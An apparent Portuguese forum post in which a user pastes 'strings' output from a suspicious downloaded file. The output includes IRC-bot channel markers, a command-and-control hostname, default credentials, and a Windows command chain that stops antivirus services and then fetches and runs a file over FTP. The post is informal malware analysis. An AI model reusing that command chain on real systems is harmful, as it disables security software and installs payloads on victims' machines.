acabei de baixar esse arquivo no ubuntu e rodei um strings nele.
uma hora ele conecta no ‘updatemicrosoft.no-ip.info’, aparentemente
E tem esse trecho:
220 Hello!
Starting FTPD handling thread.
H1d3WoRK
update.exe
#btnet
godofwar
#btlog
#bttrans
#btinfcha
#btkill
root
1234
root
1234
filepatch
exename.exe
remove
download
uizh2984
*@CYBER-TERROR.COM
godofwar
updatemicrosoft.no-ip.info
[DEBUG] Extracting resource, extract_resource()...
[DEBUG] Checking if file exists, file_exists()...
Sem falar no temivel
net stop "AntiVir PersonalEdition Classic Guard" &net stop "Security Center" &net stop "Symantec AntiVirus" &net stop "Norton AntiVirus Server" &net stop navapsvc &net stop kavsvc &net stop McAfeeFramework &net stop NOD32krn &net stop McShield &echo open %s %d > i&echo user %s %s >> i &echo get %s >> i &echo bye >> i &ftp -n -v -s:i &del i &%s &exit
Tem uma lista de palavras q parecem ser senhas comuns (como texas, Texas, kool, 123) e uma lista de programas .exe comuns como notepad.exe – enfim é coisa do capeta.
Humm… parece que o virus ja foi removido :twisted: